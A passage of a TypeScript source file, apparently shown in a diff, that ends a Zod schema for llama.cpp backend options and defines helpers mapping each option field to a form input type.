fim_qwen_7b_spec: z.boolean().optional(),
fim_qwen_14b_spec: z.boolean().optional(),
})
// Infer the TypeScript type from the schema
export type LlamaCppBackendOptions = z.infer<typeof LlamaCppBackendOptionsSchema>
// Helper to get all LlamaCpp backend option field keys
export function getAllLlamaCppFieldKeys(): (keyof LlamaCppBackendOptions)[] {
return Object.keys(LlamaCppBackendOptionsSchema.shape) as (keyof LlamaCppBackendOptions)[]
}
// Get field type for LlamaCpp backend options
export function getLlamaCppFieldType(key: keyof LlamaCppBackendOptions): 'text' | 'number' | 'boolean' | 'array' {
const fieldSchema = LlamaCppBackendOptionsSchema.shape[key]
if (!fieldSchema) return 'text'
// Handle ZodOptional wrapper
const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
if (innerSchema instanceof z.ZodBoolean) return 'boolean'
if (innerSchema instanceof z.ZodNumber) return 'number'
if (innerSchema instanceof z.ZodArray) return 'array'
return 'text' // ZodString and others default to text
}

Some files were not shown because too many files have changed in this diff Show More